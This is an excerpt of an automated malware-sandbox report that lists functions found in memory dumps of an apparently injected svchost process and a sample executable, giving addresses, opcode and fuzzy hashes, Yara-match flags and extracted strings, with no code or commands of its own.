Instruction Fuzzy Hash: FD90022230140403D140B25854586464006D7E1305F95D061E0418559CDA2589569222

Function 03B72D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2126c3395befe59c0d4d206e1a3a5e794ccc9cec0105e06f9aa778df06988fa2
Instruction ID: 0164b00fdb9fb81ef51e3b9e717393c5b91312bb66d9c19cd421e665cc2d0048
Opcode Fuzzy Hash: 2126c3395befe59c0d4d206e1a3a5e794ccc9cec0105e06f9aa778df06988fa2
Instruction Fuzzy Hash: D490022A21340403D180B258544864A000687D1306FD5D465A001955DCCA2589699321

Function 03B73D10 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0568e034a5b9cbd1e290cb8453d1d78194b5ce07ad3b8f733cbd3a7a742ed8f3
Instruction ID: 8fb32997389423909da968daa0dee92b8779095e94065eaeddd2adf8a0ebf889
Opcode Fuzzy Hash: 0568e034a5b9cbd1e290cb8453d1d78194b5ce07ad3b8f733cbd3a7a742ed8f3
Instruction Fuzzy Hash: 0B900232202405439540B3585844A8E410687E1306BD5D465A0019559CCA2489619221

Function 03B72D00 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86da4803ebe63b4e52f44602b24f2ccc818cfe29804c2b8d03662aeb49ad0010
Instruction ID: 371a84279ff51116a34a11b2f35c6f87c50140a3b6121fed98dfc2a49790e87a
Opcode Fuzzy Hash: 86da4803ebe63b4e52f44602b24f2ccc818cfe29804c2b8d03662aeb49ad0010
Instruction Fuzzy Hash: 5C90022220544843D100B6585448A46000687D0309F95D061A106859ADC7358951E131

Function 03B73D70 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c4c85c094d9e24198479a5a4ecb7bf822820347a7a1e29172d0d11c00643cbf
Instruction ID: e26ba4ea7e22664486c025fb0f00e77351f3495701d8ad16081b29aba9771a6e
Opcode Fuzzy Hash: 1c4c85c094d9e24198479a5a4ecb7bf822820347a7a1e29172d0d11c00643cbf
Instruction Fuzzy Hash: 5C90023620140803D510B2585844686004787D0305F95D461A042855DD876489A1E121

Function 03B72CA0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a81772f440c51019b86228001639c2d849d8467fd4ecefa1308dd0617618d48
Instruction ID: d77ef9f95a7e436ce4d6bae011aac185d10b5b716cec6cde6bb1add05b096567
Opcode Fuzzy Hash: 1a81772f440c51019b86228001639c2d849d8467fd4ecefa1308dd0617618d48
Instruction Fuzzy Hash: 4C90023220140803D100B6985448686000687E0305F95D061A502855AEC7758991A131

Function 03B72CF0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4325be83b5cddeb5f144a2a498c3cb2406ee6783551250f4cfc2ed51b1e529b
Instruction ID: 637af7d8a0b7c1b1ffe72163703b070e43e872e40d90049079bb4fbf5ea80a78
Opcode Fuzzy Hash: b4325be83b5cddeb5f144a2a498c3cb2406ee6783551250f4cfc2ed51b1e529b
Instruction Fuzzy Hash: 9D90023220140803D100B2585548747000687D0305F95D461A042855DDD7668951A121

Function 03B72CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d6c84d03f7c16c68be727eecf32e3dfd265e17d0d937c5e47852d97efc3dd28
Instruction ID: e6f2d5aa0042443b425f96beeb880aa97bc68b5dd8f4ec4200ee233a0640d725
Opcode Fuzzy Hash: 0d6c84d03f7c16c68be727eecf32e3dfd265e17d0d937c5e47852d97efc3dd28
Instruction Fuzzy Hash: 7990022260540803D140B2585458746001687D0305F95D061A0028559DC7698B55A6A1

Function 03B72C70 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd6eb4b0f19c5d051a2a5bb2af1d6b901362b0308c6881cf29d08942137d6d16
Instruction ID: 5f60b8b7f756a153d514387fa12c55004aaa805e28d7c1bb60b70dd5cae4abfb
Opcode Fuzzy Hash: dd6eb4b0f19c5d051a2a5bb2af1d6b901362b0308c6881cf29d08942137d6d16
Instruction Fuzzy Hash: 1490023220148C03D110B258844478A000687D0305F99C461A442865DD87A58991B121

Function 03B72C60 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9254fea5c788b415d804790b06eb15edcba0d20ca4d155644ed121425bcc3302
Instruction ID: cc9629ca1eee8af38c4de0344c4358dcc29b09ef635bf1e26d4cfbdd4a9ecb92
Opcode Fuzzy Hash: 9254fea5c788b415d804790b06eb15edcba0d20ca4d155644ed121425bcc3302
Instruction Fuzzy Hash: 1690023220140C43D100B2584444B86000687E0305F95C066A0128659D8725C951B521

Function 0040ACB3 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8953eb8080bc0b33f3dee6d5bfa8763161cd264061a20aa6d05353b14da8167
Instruction ID: d97c68f7dbbba05d8cf07051267a23f6e1d3bceb9360bfa55da32bacf9c18a48
Opcode Fuzzy Hash: c8953eb8080bc0b33f3dee6d5bfa8763161cd264061a20aa6d05353b14da8167
Instruction Fuzzy Hash:

Function 03B72C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 2dd79678d772cc262ae864bc82046cc7324b3643f083d73dfe72a31cdf509098
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Function 03B72890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 03B7293C
___swprintf_l.LIBCMT ref: 03B7295E
___swprintf_l.LIBCMT ref: 03B729A3
___swprintf_l.LIBCMT ref: 03BAA52E

Strings

::ffff:0:%u.%u.%u.%u, xrefs: 03BAA54E
ffff:, xrefs: 03BAA504
:%u.%u.%u.%u, xrefs: 03BAA5B8
::%hs%u.%u.%u.%u, xrefs: 03BAA527

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: bda5b5553b7d9e6624aa9e52610cb85737c896891a2bbe68e934aa90c283b8d3
Instruction ID: 5c8af0b260fa8f49e82fee6a2bec37b672049d5b7af52ce6f4bafd1734a4b12b
Opcode Fuzzy Hash: bda5b5553b7d9e6624aa9e52610cb85737c896891a2bbe68e934aa90c283b8d3
Instruction Fuzzy Hash: 2951BAB5A04516BFCB10DB5C889097EFBB8FF48248B5885F9E475DB641D234DE44CBA0

Function 03B67630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03BA4742
CLIENT(ntdll): Processing section info %ws..., xrefs: 03BA4787
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03BA46FC
Execute=1, xrefs: 03BA4713
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03BA4655
ExecuteOptions, xrefs: 03BA46A0
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03BA4725

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 8edaa95277f77d1f3dad6c13c8992ce6a7eacbfba8783e83b242fb7da59af778
Instruction ID: 1aabcf3da9a3235e24e763a942f275d0993f24d19d57f1bfdf56f9e082e25d5a
Opcode Fuzzy Hash: 8edaa95277f77d1f3dad6c13c8992ce6a7eacbfba8783e83b242fb7da59af778
Instruction Fuzzy Hash: 1C51E935A007196ADF20EAA9DC86FBE77B8EF0430CF1400F9E515AB192DFB59E458B50

Function 03B7B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 03B7B6BF

Strings

-, xrefs: 03B7B650
+, xrefs: 03B7B65A
0, xrefs: 03B7B695
0, xrefs: 03B7B66F

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: c98adefd2fe21eb7a86325b7c6ea356b3f706f4d12cdedb210bce4eace38ae73
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: D1818D74E052499EDF28CE68C8917FEFBA5EF45358F1C42EAD871AB390C63499408F50

Function 03B5F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Re-Waiting, xrefs: 03BA031E
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03BA02E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03BA02BD

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 087b3c6e218ef54720085f7c6e3b4acc6130a3b5462a808bd7e03f696cd86970
Instruction ID: 510e3df8f61d4da77e553b79e594c9d7072bdefd73ebe65b350634b140656ef6
Opcode Fuzzy Hash: 087b3c6e218ef54720085f7c6e3b4acc6130a3b5462a808bd7e03f696cd86970
Instruction Fuzzy Hash: 7EE18B30608B41DFD725DF28C884B2AF7E4FB88318F184AB9F9A58B291D774D945CB42

Function 03B6BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03BA7B7F
RTL: Re-Waiting, xrefs: 03BA7BAC
RTL: Resource at %p, xrefs: 03BA7B8E

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 662b2cbca6065cb9a2120ee14f295194e3c45a22ae1abea4f0f90c9990b7a974
Instruction ID: be1c3da9c046d706e21d55d1abf6427ce4344e5dc764548732c983d4fc19e5fa
Opcode Fuzzy Hash: 662b2cbca6065cb9a2120ee14f295194e3c45a22ae1abea4f0f90c9990b7a974
Instruction Fuzzy Hash: D341F235704B028FC724DE29CC51B6AB7E9EB88718F040ABDE95ADB291DB70E4058B91

Function 03B6B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03BA728C

Strings

RTL: Re-Waiting, xrefs: 03BA72C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03BA7294
RTL: Resource at %p, xrefs: 03BA72A3

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: a58de2fcca25127f853a506746bf61fb5a3f279b15348b60c2fc0b2297575efd
Instruction ID: d59ce6bb61568b8cc3336843d55ab8582c602670d6e548c617b9d9ab44cd8cee
Opcode Fuzzy Hash: a58de2fcca25127f853a506746bf61fb5a3f279b15348b60c2fc0b2297575efd
Instruction Fuzzy Hash: 4C410135B08B06ABCB20CE69CC42B6AB7B5FB85718F1406B9F855DB241DB24E81287D0

Function 03B77D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 03B77E8B

Strings

+, xrefs: 03B77DE8
-, xrefs: 03B77DDD

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 7fd76f46543c12adfd7659b1382698188c3b6ebd446de7a33aac0e7674ebad32
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: C191A670E002599FDF24DE69C982ABEB7B5EF44328F1845BAE875EB2C0DF3099418750

Function 03B39126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 03B39191
@, xrefs: 03B39175

Memory Dump Source

Source File: 00000001.00000002.2247988228.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_3b00000_svchost.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 075b8bf7e9bcc10ff6b3cdbf201dd5f7294661f2159b5051153c1afd90195c58
Instruction ID: 82c12e0482d66d7cbfdc34f74bcfc94d7ed0be57b6bae771ccada254ecd95eaa
Opcode Fuzzy Hash: 075b8bf7e9bcc10ff6b3cdbf201dd5f7294661f2159b5051153c1afd90195c58
Instruction Fuzzy Hash: 9A811C76D00269ABDB31DF54CC44BEEB7B8AB08714F0445EAA919BB240D7709E84CFA4

Analysis Process: cuwattsjDnLrZm.exePID: 1068, Parent PID: 7392COMMON

Executed Functions

Function 0294BCE4 Relevance: 51.9, Strings: 41, Instructions: 614COMMON

Download Yara Rule

Strings

>, xrefs: 0294C019
-, xrefs: 0294C163
hs, xrefs: 0294BFE0
h, xrefs: 0294C159
NH, xrefs: 0294BE61
N2, xrefs: 0294C1BA
`>, xrefs: 0294C148
{K, xrefs: 0294BDA4
5\, xrefs: 0294C219
qj, xrefs: 0294BDAE
Gi, xrefs: 0294C041
b, xrefs: 0294BECE
%, xrefs: 0294BF71
k, xrefs: 0294BF7B
h, xrefs: 0294C1CF
(1, xrefs: 0294C1C1
h, xrefs: 0294BF67
~, xrefs: 0294BFCB
k, xrefs: 0294BFBD
-o, xrefs: 0294BFAF
A, xrefs: 0294BED8
t, xrefs: 0294C205
Z3, xrefs: 0294C4F4
!, xrefs: 0294C0A2
|, xrefs: 0294BF8F
L<, xrefs: 0294BE32
r, xrefs: 0294BEE2
g, xrefs: 0294C0AC
!, xrefs: 0294BE92
[P, xrefs: 0294BE10
K], xrefs: 0294BE02
Ri, xrefs: 0294C1A9
a>, xrefs: 0294C723
A, xrefs: 0294C0DE
G, xrefs: 0294C0D4
#y, xrefs: 0294C22D
s, xrefs: 0294C241
!, xrefs: 0294BFC4
~, xrefs: 0294BF5D
9, xrefs: 0294BEA6
u, xrefs: 0294C16D

Memory Dump Source

Source File: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25e0000_cuwattsjDnLrZm.jbxd

Yara matches

Similarity

API ID:
String ID: h$!$!$#y$%$(1$-$-o$5\$9$>$A$A$G$Gi$K]$L<$N2$NH$Ri$Z3$[P$`>$a>$b$g$h$h$hs$k$qj$r$s$u${K$|$~$!$k$t$~
API String ID: 0-1859444510
Opcode ID: aaa2b880f00d846e7b3265746c4661427bcea6f1d25d75568b62f24358976bad
Instruction ID: 9164b04c830c195c33ce089049a7eeb357f53b8becf468511c6cbc6b5a27426e
Opcode Fuzzy Hash: aaa2b880f00d846e7b3265746c4661427bcea6f1d25d75568b62f24358976bad
Instruction Fuzzy Hash: DB62C5B0D06229CFEB28CF44C995BEDBBB2BB45308F1085DAC50D6B281CBB55A85CF55

Function 0296A758 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25e0000_cuwattsjDnLrZm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f6b346ec86e17c9b815bfeb77375bf28f45e9b20623e6dc05382557c79596d9
Instruction ID: ad3f7f7041e8158523a13043b31a9ae3a6b344b85ec8ca71d42fa8f2c3155375
Opcode Fuzzy Hash: 7f6b346ec86e17c9b815bfeb77375bf28f45e9b20623e6dc05382557c79596d9
Instruction Fuzzy Hash: 4231E6B5A00648ABDB14DF99C845EEFB7F9EF89700F10820AF959A7240D734A911CFA5

Function 0296B0C8 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25e0000_cuwattsjDnLrZm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cadba0eef2dc07b62d10619e85f904595cd4474d88f92a491a4e78edcb21e62e
Instruction ID: 019343690eaad6f264dff87901003dee81b9e43876b7f44857d48b37ec15e6bb
Opcode Fuzzy Hash: cadba0eef2dc07b62d10619e85f904595cd4474d88f92a491a4e78edcb21e62e
Instruction Fuzzy Hash: 8E2114B5A00708AFDB14DF98DC45EAFB7A9EF89700F00850AFD18AB240D770A911CBB5

Function 02959B88 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25e0000_cuwattsjDnLrZm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be64f04fac06b1aa18e565d479fd2aa5feae3330749adeb3d2978e17a348b795
Instruction ID: 18811fa93401479474b57f33b4102694796bfa1ea1b02b96414c48c2604cdda4
Opcode Fuzzy Hash: be64f04fac06b1aa18e565d479fd2aa5feae3330749adeb3d2978e17a348b795
Instruction Fuzzy Hash: A91182B23803057BF720AA558C86FBB379D9FC5B54F244015FB08BA2C0D6A4B8118BB8

Function 029453B3 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25e0000_cuwattsjDnLrZm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf5e6340865fb9a2eaa85096eec43b35fd5d26cbf91a1885ade4672875770867
Instruction ID: c769a5094a76611330fac79aa3deb53b9cc9ebd767f00cc689d1edc47986fd23
Opcode Fuzzy Hash: cf5e6340865fb9a2eaa85096eec43b35fd5d26cbf91a1885ade4672875770867
Instruction Fuzzy Hash: 9D11C0B2509211DBC71165FEAC40FC47F95EB6226C7F5116ED4448BA52FB53884BC7C1

Function 0294534C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25e0000_cuwattsjDnLrZm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc842ad6ab4bb2150f34800ad83eed1316bbf065bdc832467ae2bcf757f43f2
Instruction ID: 03d8f2953d9914e56bcaa9d416ee519a8ab2565810d529d265cd9e1fcbaa0ae9
Opcode Fuzzy Hash: 7fc842ad6ab4bb2150f34800ad83eed1316bbf065bdc832467ae2bcf757f43f2
Instruction Fuzzy Hash: 8E1163B2601115AFE714CAD9DC85FFF7BACEF85324F10425AFA08D6184E7B19541CBA0

Function 0296A3E8 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25e0000_cuwattsjDnLrZm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 489c83731e684589cd9db4c1fc3d340be36bd4364d7621a5162e1b3168924a87
Instruction ID: cb8bfee6b1cff15ffed64c67227789b1c31415c7b3ab34c9842b536195366542
Opcode Fuzzy Hash: 489c83731e684589cd9db4c1fc3d340be36bd4364d7621a5162e1b3168924a87
Instruction Fuzzy Hash: F0115E71A01305ABDB14EB94CC45FAFB7ADEB85710F008509FD586B280DB70A911CBB5

Function 02968348 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25e0000_cuwattsjDnLrZm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38234f2d9ebf51ba7619936f8c73339ae55e83bfa559da4152097212dca58e85
Instruction ID: 5afc7731ae71cae97b22e17efb66464d39f50350f0d8f3ba063b72f78f4650d7
Opcode Fuzzy Hash: 38234f2d9ebf51ba7619936f8c73339ae55e83bfa559da4152097212dca58e85
Instruction Fuzzy Hash: 0111DAB6E1121CAF9B00DFA9D9409EEB7F9FB88210F14456AE919E7200E7705A048FE1

Function 02966F78 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25e0000_cuwattsjDnLrZm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a61c30bc07f0dfb7a62121cdf64ecfd354c3f03f6991ebf0961fbd564b30d377
Instruction ID: 57322ddfc6d77d2fd6b3f9a60179985126543876f4022634ea3378997cfbc8fb
Opcode Fuzzy Hash: a61c30bc07f0dfb7a62121cdf64ecfd354c3f03f6991ebf0961fbd564b30d377
Instruction Fuzzy Hash: D401C2B2D11219AE9B40DFE8C9409EEBBF9BB48204F14466AE805F2240E7745A048FA5

Function 02945359 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25e0000_cuwattsjDnLrZm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7964c3d2afde61d0445226abd7e74b0c2025b88b11d241671af4cda05d1faad
Instruction ID: 2a6025b5ac073535e4bebcd3f17e3de07231fb3a664d335b8a1dc1144241549d
Opcode Fuzzy Hash: a7964c3d2afde61d0445226abd7e74b0c2025b88b11d241671af4cda05d1faad
Instruction Fuzzy Hash: D2F0A7B3604216ABE7145AADEC80F9AF7DCEB95338F650222FD1C96241D672D45187E0

Function 0296A668 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25e0000_cuwattsjDnLrZm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc1f55e7478eb04ed43b22d1ad8bdd32bf4c6d8549377333620c56c93194ce6f
Instruction ID: b52d8647856a4cd6e802a2086ebac79bc4b9f7763df2e57ab53350d7415eea42
Opcode Fuzzy Hash: fc1f55e7478eb04ed43b22d1ad8bdd32bf4c6d8549377333620c56c93194ce6f
Instruction Fuzzy Hash: 72F0F8762002497BD610DF99DC41EAB77ADEFC9B10F004519F918A7240D670B9518BB4

Function 02959CA8 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 025E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_25e0000_cuwattsjDnLrZm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4400724574bebba7dbd4111d29ba5d8940e5e091b9d93053c9c37b5e8800dc0
Instruction ID: 8ffebcb74bc33e6f8139625dbb41c8220fd37abe901b889216db386cd5d7ad3c
Opcode Fuzzy Hash: f4400724574bebba7dbd4111d29ba5d8940e5e091b9d93053c9c37b5e8800dc0
Instruction Fuzzy Hash: 5BF0827190520CEBEB14CF64D841BDDBBB8EB04320F204769E8289B280D6349750CB81

